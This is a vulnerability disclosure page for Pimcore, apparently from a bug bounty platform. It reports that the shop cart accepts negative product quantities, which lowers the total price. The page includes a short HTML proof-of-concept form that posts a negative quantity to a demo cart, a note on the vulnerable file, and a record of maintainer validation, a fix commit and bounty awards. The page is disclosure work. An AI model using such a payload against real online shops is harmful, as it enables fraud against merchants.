Business Logic Errors in pimcore/pimcore

Valid

Reported on

Jul 24th 2021

✍️ Description

Pimcore is vulnerable to Business Logic error through negative products amount.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="https://demo.pimcore.fun/en/cart" method="POST">
  <input name="items[12]" value="1">
  <input name="items[440]" value="-69">
  <input type="submit">
</form>

Save the above content into an HTML file.
Open the HTML file on the browser and click on Submit button.
Check out the total price.

PoC video.

💥 Impact

It is possible to get all products for free or with a very low price.

Occurrences

MultiCartManager.php L152

Bernhard Rusch

commented 2 years ago

Maintainer

@admin how can I signup as the maintainer of a project?

Z-Old

commented 2 years ago

Admin

Hey Bernhard, you should have access now. You will also automatically have access to all future pimcore disclosures. Do let me know if you encounter any further issues viewing the details of this report.

Bernhard Rusch

commented 2 years ago

Maintainer

Yep, works fine now, thanks a lot! 👍

Bernhard Rusch validated this vulnerability 2 years ago

Renan Rocha has been awarded the disclosure bounty

The fix bounty is now up for grabs

Bernhard Rusch marked this as fixed with commit f51595 2 years ago

Bernhard Rusch has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

Bernhard Rusch